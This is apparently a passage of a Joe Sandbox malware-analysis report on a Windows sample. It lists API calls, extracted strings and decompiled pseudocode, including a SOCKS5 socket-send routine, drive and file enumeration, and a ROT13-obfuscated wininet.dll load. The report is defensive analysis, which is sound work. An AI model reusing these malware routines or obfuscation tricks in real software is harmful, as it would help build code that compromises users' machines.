                                                                          0x0040533e
                                                                          0x00405345
                                                                          0x0040534c
                                                                          0x0040534e
                                                                          0x00405351
                                                                          0x00405359
                                                                          0x00405359
                                                                          0x00405361

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: gethostbynamegethostnameinet_ntoa
                                                                          • String ID: 192.168.1.2$@
                                                                          • API String ID: 289322838-3711723240
                                                                          • Opcode ID: 08511f6a8ca575260eebd435f8fc3ef842af75c020395b93753436b22eaa97bc
                                                                          • Instruction ID: 9ec42d045907c7db8908afb764d072bf234eb471670fc80d8c874dbff0fee724
                                                                          • Opcode Fuzzy Hash: 08511f6a8ca575260eebd435f8fc3ef842af75c020395b93753436b22eaa97bc
                                                                          • Instruction Fuzzy Hash: 7EE030B0A04B048FC700FF39C6C650ABBF4AF44348F06487DE986A7355EA38E9088B57
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 48%
                                                                          			E10001451(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, signed int _a4, intOrPtr _a8, signed int _a12, signed short _a16) {
                                                                          				intOrPtr _v8;
                                                                          				intOrPtr _v12;
                                                                          				intOrPtr _v16;
                                                                          				signed short _v30;
                                                                          				intOrPtr _v56;
                                                                          				short _v58;
                                                                          				void _v60;
                                                                          				int _v84;
                                                                          				intOrPtr _v88;
                                                                          				char _v92;
                                                                          				intOrPtr _v96;
                                                                          				signed short* _v100;
                                                                          				signed int _v104;
                                                                          				intOrPtr _v108;
                                                                          				intOrPtr _v112;
                                                                          				signed int _t35;
                                                                          				void* _t40;
                                                                          				signed int _t51;
                                                                          				signed int _t60;
                                                                          				void* _t62;
                                                                          				void* _t63;
                                                                          				signed int* _t65;
                                                                          
                                                                          				_v16 = __ebx;
                                                                          				_v12 = __esi;
                                                                          				_v8 = __edi;
                                                                          				_t60 = _a12;
                                                                          				_t35 = _a16 & 0x0000ffff;
                                                                          				_v30 = _t35;
                                                                          				_v84 = 0;
                                                                          				_v88 = 1;
                                                                          				_v92 = 2;
                                                                          				L1000301C();
                                                                          				_t63 = _t62 - 0xc;
                                                                          				_t51 = _t35;
                                                                          				if(_t35 != 0xffffffff) {
                                                                          					asm("cld");
                                                                          					memset( &_v60, 0, 4 << 2);
                                                                          					_v60 = 2;
                                                                          					_v56 =  *_t60;
                                                                          					_v58 = _v30 & 0x0000ffff;
                                                                          					_v96 = 0x10;
                                                                          					_t40 =  &_v60;
                                                                          					_v100 = _t40;
                                                                          					_v104 = _t51;
                                                                          					L10003024();
                                                                          					_t65 = _t63 + 0xc - 0xc;
                                                                          					if(_t40 == 0xffffffff) {
                                                                          						_v100 =  &_v30;
                                                                          						_v104 = _t60;
                                                                          						_v108 = _a8;
                                                                          						_v112 = 5;
                                                                          						 *_t65 = _a4;
                                                                          						E1000140F();
                                                                          						 *_t65 = _t51;
                                                                          						L10003014();
                                                                          						_t51 = 0xffffffff;
                                                                          					}
                                                                          				} else {
                                                                          					E1000140F(_a4, 1, _a8, _t60,  &_v30);
                                                                          				}
                                                                          				return _t51;
                                                                          			}

























                                                                          0x10001457
                                                                          0x1000145a
                                                                          0x1000145d
                                                                          0x10001460
                                                                          0x10001463
                                                                          0x10001467
                                                                          0x1000146b
                                                                          0x10001473
                                                                          0x1000147b
                                                                          0x10001482
                                                                          0x10001487
                                                                          0x1000148a
                                                                          0x1000148f
                                                                          0x100014bb
                                                                          0x100014c6
                                                                          0x100014c8
                                                                          0x100014d0
                                                                          0x100014d7
                                                                          0x100014db
                                                                          0x100014e3
                                                                          0x100014e6
                                                                          0x100014ea
                                                                          0x100014ed
                                                                          0x100014f2
                                                                          0x100014f8
                                                                          0x100014fd
                                                                          0x10001501
                                                                          0x10001508
                                                                          0x1000150c
                                                                          0x10001517
                                                                          0x1000151a
                                                                          0x1000151f
                                                                          0x10001522
                                                                          0x1000152a
                                                                          0x1000152a
                                                                          0x10001491
                                                                          0x100014b1
                                                                          0x100014b1
                                                                          0x1000153d

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: CodeSendSocks5$closesocketconnectsocketswrite
                                                                          • String ID:
                                                                          • API String ID: 1690081365-0
                                                                          • Opcode ID: 226da635e8a6871d8eb6d44e768528b8faa0e03256744c755adbe7396fca87cb
                                                                          • Instruction ID: 20981c635e85231f24b59aa8ab89d4f0d4c72e8356007f7a924271a659283d8c
                                                                          • Opcode Fuzzy Hash: 226da635e8a6871d8eb6d44e768528b8faa0e03256744c755adbe7396fca87cb
                                                                          • Instruction Fuzzy Hash: 5821C6B5904309ABDB00DFA8D48429EBBF4FF48360F108A2EF99897391D375A954DB52
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • lstrcat.KERNEL32 ref: 004028F6
                                                                          • lstrcat.KERNEL32 ref: 00402910
                                                                          • Sleep.KERNEL32 ref: 00402EC5
                                                                          • lstrcat.KERNEL32 ref: 00402929
                                                                            • Part of subcall function 00404F0A: GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                            • Part of subcall function 00404F0A: LoadLibraryA.KERNEL32 ref: 00404F41
                                                                            • Part of subcall function 00404F0A: InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$ConnectedHandleInternetLibraryLoadModuleSleepState
                                                                          • String ID: L@$admin@bigtits.com
                                                                          • API String ID: 2287753751-2810593236
                                                                          • Opcode ID: c4923e9d2adc1735435ee3343d15d9114c514d9cd1cf3e75ac1c13b8b8656890
                                                                          • Instruction ID: f8f521ecf4af99865028921a37a865861f0bf00d847523e115314e8123b3051d
                                                                          • Opcode Fuzzy Hash: c4923e9d2adc1735435ee3343d15d9114c514d9cd1cf3e75ac1c13b8b8656890
                                                                          • Instruction Fuzzy Hash: 8611CE769053198BCB51EF64D9845CEBBF4EF44314F40857BE885A3240EB349698CF96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E00404620(CHAR* _a4, int _a8, CHAR* _a12) {
                                                                          				void* _v12;
                                                                          				void* _v20;
                                                                          				void* _v24;
                                                                          				CHAR* _v28;
                                                                          				int _t13;
                                                                          				CHAR* _t14;
                                                                          				int _t15;
                                                                          				CHAR* _t16;
                                                                          				void* _t17;
                                                                          				CHAR** _t20;
                                                                          
                                                                          				_t16 = _a4;
                                                                          				_t15 = _a8;
                                                                          				memset(_t16, 0, _t15);
                                                                          				_t13 = GetSystemDirectoryA(_t16, _t15);
                                                                          				_v28 = _t16;
                                                                          				L0040C310();
                                                                          				_t20 = _t17 - 4;
                                                                          				if( *((char*)(_t13 + _t16 - 1)) != 0x5c) {
                                                                          					_v28 = 0x40f156;
                                                                          					 *_t20 = _t16;
                                                                          					L0040C328();
                                                                          					_t20 = _t20 - 8;
                                                                          				}
                                                                          				_t14 = _a12;
                                                                          				_v28 = _t14;
                                                                          				 *_t20 = _t16;
                                                                          				L0040C328();
                                                                          				return _t14;
                                                                          			}













                                                                          0x00404628
                                                                          0x0040462b
                                                                          0x0040463d
                                                                          0x00404649
                                                                          0x00404651
                                                                          0x00404654
                                                                          0x00404659
                                                                          0x00404661
                                                                          0x00404663
                                                                          0x0040466b
                                                                          0x0040466e
                                                                          0x00404673
                                                                          0x00404673
                                                                          0x00404676
                                                                          0x00404679
                                                                          0x0040467d
                                                                          0x00404680
                                                                          0x0040468e

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$DirectorySystemlstrlenmemset
                                                                          • String ID:
                                                                          • API String ID: 1065462249-0
                                                                          • Opcode ID: 52e21126391f9f1a99804af5917ba2fff1412d2631d262131c3ca1ad05ec0486
                                                                          • Instruction ID: 403430f860fbc260acd97b7d31e4c447ffd2c09bc4da5a50c9a35cc548e728c4
                                                                          • Opcode Fuzzy Hash: 52e21126391f9f1a99804af5917ba2fff1412d2631d262131c3ca1ad05ec0486
                                                                          • Instruction Fuzzy Hash: F8F019B1408714DBD700BF29D98555EBFA4AB44754F40892EFC8867282D3399A588BDB
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 100%
                                                                          			E10002209(CHAR* _a4, int _a8, CHAR* _a12) {
                                                                          				void* _v12;
                                                                          				void* _v20;
                                                                          				void* _v24;
                                                                          				CHAR* _v28;
                                                                          				int _t13;
                                                                          				CHAR* _t14;
                                                                          				int _t15;
                                                                          				CHAR* _t16;
                                                                          				void* _t17;
                                                                          				CHAR** _t20;
                                                                          
                                                                          				_t16 = _a4;
                                                                          				_t15 = _a8;
                                                                          				memset(_t16, 0, _t15);
                                                                          				_t13 = GetSystemDirectoryA(_t16, _t15);
                                                                          				_v28 = _t16;
                                                                          				L10003570();
                                                                          				_t20 = _t17 - 4;
                                                                          				if( *((char*)(_t13 + _t16 - 1)) != 0x5c) {
                                                                          					_v28 = 0x1000508e;
                                                                          					 *_t20 = _t16;
                                                                          					L10003578();
                                                                          					_t20 = _t20 - 8;
                                                                          				}
                                                                          				_t14 = _a12;
                                                                          				_v28 = _t14;
                                                                          				 *_t20 = _t16;
                                                                          				L10003578();
                                                                          				return _t14;
                                                                          			}













                                                                          0x10002211
                                                                          0x10002214
                                                                          0x10002226
                                                                          0x10002232
                                                                          0x1000223a
                                                                          0x1000223d
                                                                          0x10002242
                                                                          0x1000224a
                                                                          0x1000224c
                                                                          0x10002254
                                                                          0x10002257
                                                                          0x1000225c
                                                                          0x1000225c
                                                                          0x1000225f
                                                                          0x10002262
                                                                          0x10002266
                                                                          0x10002269
                                                                          0x10002277

                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: lstrcat$DirectorySystemlstrlenmemset
                                                                          • String ID:
                                                                          • API String ID: 1065462249-0
                                                                          • Opcode ID: 5b75b92667313997f23b2e058039c06bba9c640d4edaca3627a5a6efffba8954
                                                                          • Instruction ID: 135e321319e3b7b44d062fa0e30293860b296fd840e12ca3df5e4efe39fd7587
                                                                          • Opcode Fuzzy Hash: 5b75b92667313997f23b2e058039c06bba9c640d4edaca3627a5a6efffba8954
                                                                          • Instruction Fuzzy Hash: C9F037B5808B14AAE702FF28D98655EBFA8EF04691F40891DF88847209D735A658CBD3
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          Strings
                                                                          • abcdefghijklmnopqrstuvwxyz, xrefs: 10001E57
                                                                          • ABCDEFGHIJKLMNOPQRSTUVWXYZ, xrefs: 10001E12
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: xstrchr
                                                                          • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ$abcdefghijklmnopqrstuvwxyz
                                                                          • API String ID: 1535612035-4170113403
                                                                          • Opcode ID: bc1ef4a9f8f1add477f6933fc24e9eacfb8676c16534aea7655073907d0485ef
                                                                          • Instruction ID: a9ec9f0fff6549f24d3912a7d9d51164a33b52da91e11de3f78b76783671d1e7
                                                                          • Opcode Fuzzy Hash: bc1ef4a9f8f1add477f6933fc24e9eacfb8676c16534aea7655073907d0485ef
                                                                          • Instruction Fuzzy Hash: 22315E74A052698FDB15CFBCC9C05AEBFF4AB08382F04016AE844D7359E735AA45CF90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetAtomNameA.KERNEL32 ref: 1000316F
                                                                            • Part of subcall function 10003430: fprintf.MSVCRT ref: 1000345D
                                                                            • Part of subcall function 10003430: fflush.MSVCRT ref: 1000346D
                                                                            • Part of subcall function 10003430: abort.MSVCRT(?,?,?,?,?,100031CE), ref: 10003472
                                                                          Strings
                                                                          • ../../gcc/gcc/config/i386/w32-shared-ptr.c, xrefs: 100031C0
                                                                          • w32_sharedptr->size == sizeof(W32_EH_SHARED), xrefs: 100031A7
                                                                          • GetAtomNameA (atom, s, sizeof(s)) != 0, xrefs: 100031CE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.259076355.0000000010001000.00000040.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                          • Associated: 00000000.00000002.259070497.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259083925.0000000010005000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259107376.0000000010008000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259117363.000000001000A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259125606.000000001000B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000000.00000002.259132398.000000001000C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_10000000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: AtomNameabortfflushfprintf
                                                                          • String ID: ../../gcc/gcc/config/i386/w32-shared-ptr.c$GetAtomNameA (atom, s, sizeof(s)) != 0$w32_sharedptr->size == sizeof(W32_EH_SHARED)
                                                                          • API String ID: 2513348418-2567175902
                                                                          • Opcode ID: b5b89244b8b56d368d30c6de513500384bbf397f3e0a96e467b4627a87de939c
                                                                          • Instruction ID: 294674767859e6a3630ece78654cf0563df7f20052ecafb954434dc6b69ec127
                                                                          • Opcode Fuzzy Hash: b5b89244b8b56d368d30c6de513500384bbf397f3e0a96e467b4627a87de939c
                                                                          • Instruction Fuzzy Hash: 77015270A04382ABF705DFA5C08429FBBE4EF893C5F50C83EE5898B759D67988409B46
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32 ref: 00404F27
                                                                          • LoadLibraryA.KERNEL32 ref: 00404F41
                                                                          • InternetGetConnectedState.WININET ref: 00404F6B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: ConnectedHandleInternetLibraryLoadModuleState
                                                                          • String ID: jvavarg.qyy
                                                                          • API String ID: 2811557832-2169444084
                                                                          • Opcode ID: 7c6175a941508692fdaf67fbae8ce577e0da1e0ff510d98013a560bc4e03a36a
                                                                          • Instruction ID: fa78873cf606c18224dba544ef8f20ca223ab6e2b08164375e4fcb1cbc50bc80
                                                                          • Opcode Fuzzy Hash: 7c6175a941508692fdaf67fbae8ce577e0da1e0ff510d98013a560bc4e03a36a
                                                                          • Instruction Fuzzy Hash: 03F062B551530486DB10BF359AC629D7AE85F41368F058A3EF8A1A32D2E73CD64CC716
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • memset.MSVCRT ref: 00403A5C
                                                                          • GetDriveTypeA.KERNEL32 ref: 00403A9D
                                                                          • Sleep.KERNEL32 ref: 00403AB1
                                                                            • Part of subcall function 00403790: _mbscpy.MSVCRT ref: 004037D8
                                                                            • Part of subcall function 00403790: memset.MSVCRT ref: 0040383B
                                                                            • Part of subcall function 00403790: FindFirstFileA.KERNEL32 ref: 0040385C
                                                                            • Part of subcall function 00403790: lstrcpy.KERNEL32 ref: 004038CC
                                                                            • Part of subcall function 00403790: _mbscat.MSVCRT ref: 00403910
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.258661614.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.258647902.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258702114.0000000000419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258761058.000000000041C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258775162.0000000000420000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258781881.0000000000423000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258787781.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258794500.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258801486.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258809125.0000000000431000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258816744.0000000000435000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258822560.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.258828695.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_GxELazkKkG.jbxd
                                                                          Similarity
                                                                          • API ID: memset$DriveFileFindFirstSleepType_mbscat_mbscpylstrcpy
                                                                          • String ID: C:\
                                                                          • API String ID: 3442435128-3404278061
                                                                          • Opcode ID: 80ea77316c1bc4b967dddd0ea6824f094094c5e0836f8c07d72c2391017bcb4f
                                                                          • Instruction ID: ed4c8215e4a3680eb399a4dacd5268703db01feabc7491714eb621602a4a9c6d
                                                                          • Opcode Fuzzy Hash: 80ea77316c1bc4b967dddd0ea6824f094094c5e0836f8c07d72c2391017bcb4f
                                                                          • Instruction Fuzzy Hash: 1A015BB0C143AC89DB65AB6588563DEBFB49F01319F0484DED6C826282C7784BD8CFD6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 39%
                                                                          			E0040B740(intOrPtr* _a4) {
                                                                          				void* _v16;
                                                                          				void* _v20;
                                                                          				void* _v24;
                                                                          				void** _v40;
                                                                          				intOrPtr* _v44;
                                                                          				intOrPtr _v48;
                                                                          				intOrPtr _v52;
                                                                          				intOrPtr _v56;
                                                                          				void* __ebx;
                                                                          				void* __esi;
                                                                          				intOrPtr _t37;
                                                                          				long _t39;
                                                                          				void* _t40;
                                                                          				void* _t41;
                                                                          				void* _t43;
                                                                          				void* _t47;
                                                                          				void* _t58;
                                                                          				void** _t61;
                                                                          				void* _t62;
                                                                          				intOrPtr* _t64;
                                                                          				void* _t68;
                                                                          				intOrPtr* _t72;
                                                                          				intOrPtr* _t76;
                                                                          				long* _t77;
                                                                          
                                                                          				_t37 =  *0x418284;
                                                                          				_t72 = _a4;
                                                                          				if(_t37 == 0) {
                                                                          					E0040B0E0(_t37);
                                                                          					_t37 =  *0x418284;
                                                                          					if( *((intOrPtr*)(_t37 + 0x30)) >= 0) {
                                                                          						goto L2;
                                                                          					} else {
                                                                          						goto L18;
                                                                          					}
                                                                          					L8:
                                                                          					if(_t68 == 5) {
                                                                          						return 5;
                                                                          					} else {
                                                                          						if(_t68 != 0) {
                                                                          							L13:
                                                                          							_t43 = 3;
                                                                          							goto L14;
                                                                          						} else {
                                                                          							if(_t64 == 0) {
                                                                          								L5:
                                                                          								_t41 =  *_v24;
                                                                          								_v24 = _t41;
                                                                          								while(1) {
                                                                          									L6:
                                                                          									_t64 = 0;
                                                                          									_t68 = 5;
                                                                          									if(_t41 != 0) {
                                                                          										_t64 =  *((intOrPtr*)(_t41 + 0x18));
                                                                          										_t68 = 0;
                                                                          									}
                                                                          									goto L8;
                                                                          								}
                                                                          							} else {
                                                                          								_v40 = _t61;
                                                                          								_v44 = _t72;
                                                                          								 *_t76 = 1;
                                                                          								_v52 =  *_t72;
                                                                          								_v48 =  *((intOrPtr*)(_t72 + 4));
                                                                          								_v56 = 1;
                                                                          								_t47 =  *_t64();
                                                                          								if(1 == 6) {
                                                                          									 *((intOrPtr*)(_t72 + 0xc)) = 0;
                                                                          									 *((intOrPtr*)(_t72 + 0x10)) = _v24;
                                                                          									_v24 = _v20;
                                                                          									_t43 = E0040B6B0(_t72, _t61);
                                                                          									if(_t43 == 7) {
                                                                          										_t51 =  *0x418284;
                                                                          										_t62 = _v24;
                                                                          										if(_t51 == 0) {
                                                                          											E0040B0E0(_t51);
                                                                          											_t51 =  *0x418284;
                                                                          										}
                                                                          										if( *(_t51 + 0x30) < 0) {
                                                                          											E0040B3B0(_t62, _t74);
                                                                          											_t51 =  *0x418284;
                                                                          										}
                                                                          										_t74 =  *(_t51 + 0x30);
                                                                          										if( *(_t51 + 0x30) != 0) {
                                                                          											_v56 = _t62;
                                                                          											 *_t76 =  *((intOrPtr*)(_t51 + 0x2c));
                                                                          											if(TlsSetValue(??, ??) == 0) {
                                                                          												GetLastError();
                                                                          											}
                                                                          										} else {
                                                                          											 *((intOrPtr*)(_t51 + 0x28)) = _t62;
                                                                          										}
                                                                          										_t51 = _v24;
